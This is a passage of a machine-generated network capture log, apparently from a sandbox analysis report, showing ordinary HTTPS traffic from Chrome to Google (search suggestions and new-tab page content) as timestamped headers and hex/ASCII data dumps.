                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC1369INData Raw: cf b5 4b b3 ba fd e0 7d 49 78 19 81 91 51 5a e6 96 b2 20 39 a7 d2 b1 5a c6 6f f8 88 f2 75 1f 5b 4e e9 64 96 58 c1 df e1 21 49 e4 77 d5 5e 86 7d 80 e0 8b 0c f5 84 fe c4 65 d3 50 70 2d 38 1e 1f 8e 90 7e 20 2a ca 28 4b 1f 56 6a 65 9e 4b bd 92 1c 4b d5 81 04 b4 81 35 28 c8 fb df 73 65 5c 00 8a 0c 55 2b d3 0c 7f f7 3d 8e bb cc 27 2d 6f 20 4b 6d 83 db 47 10 65 c7 f9 af 70 d5 3d 50 f5 89 0d d1 6e 2d dc 8a b6 de 96 5b 83 19 ed 27 fa 20 9d b8 31 18 6b a9 da 1f 10 fd f9 3d 13 23 ea c9 2c 6e 56 98 81 0a 02 3e 51 4d 95 de f7 94 eb 6e 87 2d 0f b6 9b 78 3c 09 4b bd e3 2e aa 96 42 ac d3 44 f4 d9 2f 6f 72 01 27 85 8f 4c 2b 1b 62 ed ed 01 02 3c 82 29 bb 80 5c 04 af ee 3e e7 a0 3d 7e a3 ca 78 ff db 7f 81 00 06 43 c9 ad 39 61 b0 45 d3 fc ae 58 d9 9b f2 84 99 eb 43 aa ce 92
                                                                                                                                                                                                                      Data Ascii: K}IxQZ 9Zou[NdX!Iw^}ePp-8~ *(KVjeKK5(se\U+='-o KmGep=Pn-[' 1k=#,nV>QMn-x<K.BD/or'L+b<)\>=~xC9aEXC
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC1369INData Raw: 32 81 14 b2 72 b6 4e d5 bc 5f 20 a2 9a 6c 0e a9 6d e3 e8 d8 18 d3 72 7b a0 e3 9f a0 e5 28 8d 4b 70 55 2a bf fe 89 27 d4 01 9c 04 eb ce 74 4a cf c4 61 47 30 80 7b 18 b7 bc bc 28 bf a2 ea 88 3a 31 1a bd fd a0 79 8c 3d aa 88 bc b4 d6 f4 b1 92 65 77 89 49 be 17 85 8a f1 d8 1d eb e6 6c a7 2d 67 cc 72 86 fd df 62 a3 2c e0 3c 76 b3 e3 b7 79 74 e1 bf 45 87 55 87 64 99 ae 19 89 06 36 20 b0 10 13 d3 8e aa a9 95 71 d3 fe cf 2c dc b0 01 65 21 b2 70 43 55 a8 e2 76 f1 7d 91 84 79 1a c0 db bb bb da 21 9e 3c ed 5f 31 c7 9f f8 73 f8 e6 65 8f d7 4d 79 59 3b e7 3f 2f 0c 22 b8 a6 10 86 b7 54 23 3b d4 5f c5 ee 55 92 83 d4 b4 9a 3c 98 21 86 31 7a 04 21 fd 1a 09 75 b7 da 6c a5 c0 d9 79 17 41 9b b4 d3 7e 1d ec 8b df e1 23 9b 5c 7e 41 67 6e d4 a2 c9 41 8b bc 23 70 7a e5 6e 0c cc
                                                                                                                                                                                                                      Data Ascii: 2rN_ lmr{(KpU*'tJaG0{(:1y=ewIl-grb,<vytEUd6 q,e!pCUv}y!<_1seMyY;?/"T#;_U<!1z!ulyA~#\~AgnA#pzn
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC1369INData Raw: 5e 38 52 16 fa 56 5a 9c 48 d7 d5 5b 76 29 00 c1 92 d9 5d 6e 3a 22 5b dd 59 44 10 f1 da c7 f0 76 b1 7a 7e c2 e8 30 59 69 89 14 bf ad a0 52 47 f1 ff 22 bc d5 aa 9c 10 06 83 1e 04 e1 bc b2 85 bd 1e 55 10 a6 df c9 6e 13 4c a9 4d f3 26 5d 14 1e e5 25 3c bd b9 21 f3 ef 78 3e 4f 5c 96 7d b1 ec 9c 43 d9 bc 8a 89 19 cd f3 c8 cc 01 c1 45 8e 9d f7 cc 7c d9 15 2d 7a 17 6a 3a 3e 85 8c 2a 89 e5 ac 06 49 a9 43 a5 14 50 f8 ce b4 6b 18 90 15 76 70 da 0f 3b fb 74 f3 3b 52 c9 88 24 79 72 90 fa 95 15 8e 33 cc 95 8d 99 dd 91 46 d3 2b c8 ac 7c e2 a4 42 bc 26 e1 b4 ce 7f 59 6b 36 fe 1c a2 65 4e ad 0a 1e 75 7f a1 eb 60 6a be 4d 87 33 d9 88 e7 d7 9a d5 ab 58 a1 d1 94 56 cd 39 e0 a3 3c db e9 65 4f c2 1e d3 b9 df 50 9c de 81 e1 c3 3d f5 5b 35 7e b3 2c dc c4 8f 3a fb f0 fd 9c db a8
                                                                                                                                                                                                                      Data Ascii: ^8RVZH[v)]n:"[YDvz~0YiRG"UnLM&]%<!x>O\}CE|-zj:>*ICPkvp;t;R$yr3F+|B&Yk6eNu`jM3XV9<eOP=[5~,:
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC1369INData Raw: ff 30 a2 a0 a0 19 90 78 10 b7 f0 dc f5 e2 ff d1 c5 f5 3c 5f 85 11 1e 8c d7 1e ef 1d e8 61 69 b3 84 6c 10 eb bb 59 b8 99 38 bc 35 f6 65 3f e2 fd 33 7e 20 ce a5 c0 d1 2d 48 50 72 5b f2 50 fb 07 c9 e5 30 30 1a 9c a8 ff f7 24 d8 b5 70 b8 b9 0d c3 64 cf 84 d2 b6 05 39 08 fd a2 46 e3 c0 27 08 a2 91 54 df 89 a2 9d 3e 2e c1 10 52 b5 65 0a 49 b8 61 ea cf 58 65 12 ae 01 e3 75 1e 2b c1 e5 0f 07 4d 3b 45 92 5e b8 b6 33 a8 d0 7e 56 b3 ad bf 73 59 53 25 e5 c8 fd f9 6b a7 9f ce 47 d5 a1 2a d7 0d 07 e0 b3 e4 a5 97 fe a6 2e bf be 20 76 f8 a1 6c f2 4c 7d a3 8e 0f 0c 1a 16 72 3c c8 26 91 61 c7 f8 96 b3 f3 25 dc 12 3e 23 81 fd 11 c0 c2 3c b0 f4 ea 46 83 5a 64 00 31 7f 06 f9 2c 12 84 10 5a d4 6d b7 b4 68 c0 83 64 74 d9 0a 7c 87 c2 eb e3 e8 85 20 77 6d 82 5b 56 35 4d 96 39 7d
                                                                                                                                                                                                                      Data Ascii: 0x<_ailY85e?3~ -HPr[P00$pd9F'T>.ReIaXeu+M;E^3~VsYS%kG*. vlL}r<&a%>#<FZd1,Zmhdt| wm[V5M9}
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC680INData Raw: ae 2c d3 5f 38 84 20 b5 ab 68 7e 2f b8 42 9e f5 62 bd ad 50 b5 fb 95 e2 96 f9 da c0 c2 b8 c2 f2 9e dc d0 d1 cc a3 93 fa 0b 1b 50 9f 86 14 14 6a 2b 73 c7 e1 ba 6c ba 52 c8 29 50 3d 7a de fe 24 ed 28 9d 4f b8 2f 0a 1a 19 ca ad 0e c0 35 ba 1f 46 23 10 ba f3 19 3a b8 81 08 a6 54 93 36 a7 a2 4d dc 11 94 77 9d a3 e0 c4 da e2 35 53 88 a2 57 da 8b cf b7 e2 d3 5d 80 b0 0c 9c 56 1e 85 c3 1c c3 2d 3f 9d 1f 2d 92 47 e3 95 2b 92 bb aa 3f 51 5d af 2e 47 11 29 de a8 39 79 cc 81 f6 c8 52 1b 98 73 02 bd 20 43 4c e7 3b 1f 63 86 9d 11 8c cd 2a d0 32 0b ec a3 45 d5 e0 83 8f cd 4c 5e 00 0b ad e7 7c 5a 10 b0 96 5d 81 e5 64 a9 9e af 1e 7e 8e fe 25 40 79 57 d5 60 83 a8 9c 3e f6 39 0d 58 5d b2 80 eb 84 f6 8f ca 6d e1 72 26 f4 4b bd 7c 7c d4 18 72 48 4e aa 47 0e f3 1d 4a 1e 6e c2
                                                                                                                                                                                                                      Data Ascii: ,_8 h~/BbPPj+slR)P=z$(O/5F#:T6Mw5SW]V-?-G+?Q].G)9yRs CL;c*2EL^|Z]d~%@yW`>9X]mr&K||rHNGJn
                                                                                                                                                                                                                      2025-03-10 23:42:42 UTC1369INData Raw: 8f 7a cc 6a bd 2c 28 79 15 0f 33 9e 8e f3 27 23 e2 63 cb 2c a5 71 c3 d7 95 84 93 ab d9 12 09 f2 79 30 37 a4 ed eb b0 a7 56 32 51 10 4e 3a 10 e6 cf 69 52 78 08 14 33 f8 af 57 18 32 5d 2a cb ac 60 19 c5 51 eb 53 32 62 c1 79 22 82 96 a1 7b 5e 15 d3 1c ee 8a d1 a2 9c 12 f7 e9 d6 ad 47 5a fd e6 93 fe 29 ee 51 f5 1d 86 4a 07 a8 6b ef 25 5d d7 40 1e 69 86 65 db 8e 28 e6 be 88 7b b7 ab 18 a9 03 20 bc 2b b5 b6 05 6d 8f 59 78 4d fc 7e cd 8d dd f6 4b 67 88 98 7d 6a 3a bb 51 c5 52 01 59 a8 09 fc ed 64 80 7d b0 0c d7 f5 5c db 7d f6 6e 8d 22 2e 68 15 48 63 d8 e7 73 ee a1 3c 1a f2 dd 50 41 76 73 db cd 28 82 87 37 11 19 48 5e c3 f3 cc 79 04 92 41 ea ce cd 4c dd 47 91 bf 82 05 1b ec 41 60 30 9c 4f 1d 30 6a 1b cb 1d b6 8e f4 89 15 50 ec 53 19 9b 12 aa 2a a5 5c 55 db 17 47
                                                                                                                                                                                                                      Data Ascii: zj,(y3'#c,qy07V2QN:iRx3W2]*`QS2by"{^GZ)QJk%]@ie({ +mYxM~Kg}j:QRYd}\}n".hHcs<PAvs(7H^yALGA`0O0jPS*\UG


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      2192.168.2.1649711142.250.74.1964437160C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-10 23:42:47 UTC501OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      X-Client-Data: CLbgygE=
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1303INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Mon, 10 Mar 2025 23:42:48 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-XAFTv64hrkoP_WiLDFZZkQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                      Accept-CH: Downlink
                                                                                                                                                                                                                      Accept-CH: RTT
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC75INData Raw: 62 39 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 68 65 20 62 61 63 68 65 6c 6f 72 20 74 6f 6e 69 67 68 74 22 2c 22 63 6f 72 72 65 63 74 69 6f 6e 61 6c 20 6f 66 66 69 63 65 72 73 20 73 74 72 69 6b 65 22 2c 22 6d 65 67 61 20
                                                                                                                                                                                                                      Data Ascii: b9f)]}'["",["the bachelor tonight","correctional officers strike","mega
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 6d 69 6c 6c 69 6f 6e 73 20 6a 61 63 6b 70 6f 74 20 6c 6f 74 74 65 72 79 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 37 20 70 72 6f 20 6d 61 78 22 2c 22 73 70 61 63 65 78 20 66 61 6c 63 6f 6e 20 39 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 22 2c 22 77 61 74 63 68 20 75 6e 77 61 6e 74 65 64 20 74 72 75 65 20 6d 61 74 65 22 2c 22 6f 69 6c 20 74 61 6e 6b 65 72 20 63 61 72 67 6f 20 73 68 69 70 20 63 6f 6c 6c 69 73 69 6f 6e 22 2c 22 62 6f 73 74 6f 6e 20 62 72 75 69 6e 73 20 62 72 61 64 20 6d 61 72 63 68 61 6e 64 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f
                                                                                                                                                                                                                      Data Ascii: millions jackpot lottery","apple iphone 17 pro max","spacex falcon 9 rocket launch","watch unwanted true mate","oil tanker cargo ship collision","boston bruins brad marchand"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"go
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 50 52 31 6c 4d 64 53 39 47 55 54 46 36 56 57 68 78 57 6e 51 7a 55 31 46 54 55 30 39 78 64 6b 74 33 57 45 49 7a 4e 45 46 4a 4e 6b 51 7a 4f 58 56 55 61 58 4a 57 4f 55 67 7a 52 6e 4a 45 59 6b 39 73 4f 55 5a 31 51 6e 64 4f 64 55 30 31 54 6b 78 55 61 7a 42 79 57 6c 42 6e 61 7a 56 50 5a 32 56 6f 59 53 39 51 63 44 6b 33 52 47 4a 36 53 57 77 78 52 45 6c 52 62 54 52 33 64 45 68 4a 61 43 39 4a 54 6c 64 45 4e 6e 49 78 55 46 52 76 63 6d 52 76 53 6a 64 35 54 30 74 6a 5a 79 74 43 4f 43 39 72 4f 58 5a 32 57 46 41 78 53 79 38 77 4d 6b 68 56 62 32 39 30 62 6a 64 6b 56 6b 4e 31 53 46 6c 47 62 45 78 49 64 47 74 6b 54 57 59 33 55 57 5a 78 54 33 68 6c 57 6b 78 71 56 55 35 50 62 57 6b 79 51 6d 6b 78 64 7a 68 53 4d 30 49 72 51 6a 52 55 62 57 63 77 63 46 4d 33 56 6b 52 46 56 6b
                                                                                                                                                                                                                      Data Ascii: PR1lMdS9GUTF6VWhxWnQzU1FTU09xdkt3WEIzNEFJNkQzOXVUaXJWOUgzRnJEYk9sOUZ1QndOdU01TkxUazByWlBnazVPZ2VoYS9QcDk3RGJ6SWwxRElRbTR3dEhJaC9JTldENnIxUFRvcmRvSjd5T0tjZytCOC9rOXZ2WFAxSy8wMkhVb290bjdkVkN1SFlGbExIdGtkTWY3UWZxT3hlWkxqVU5PbWkyQmkxdzhSM0IrQjRUbWcwcFM3VkRFVk
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC151INData Raw: 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                      Data Ascii: 3,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["ENTITY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      3192.168.2.1649713142.250.74.1964437160C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-10 23:42:47 UTC359OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      4192.168.2.1649715142.250.74.1964437160C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-10 23:42:47 UTC404OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      X-Client-Data: CLbgygE=
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1055INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Version: 734020781
                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                      Accept-CH: Downlink
                                                                                                                                                                                                                      Accept-CH: RTT
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                      Date: Mon, 10 Mar 2025 23:42:48 GMT
                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC323INData Raw: 32 36 30 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                      Data Ascii: 2604)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 5c 75 30 30 33 64 5c 22 67 62 5f 6c 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c
                                                                                                                                                                                                                      Data Ascii: \u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76
                                                                                                                                                                                                                      Data Ascii: span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32
                                                                                                                                                                                                                      Data Ascii: 003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-2
                                                                                                                                                                                                                      2025-03-10 23:42:48 UTC1378INData Raw: 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c
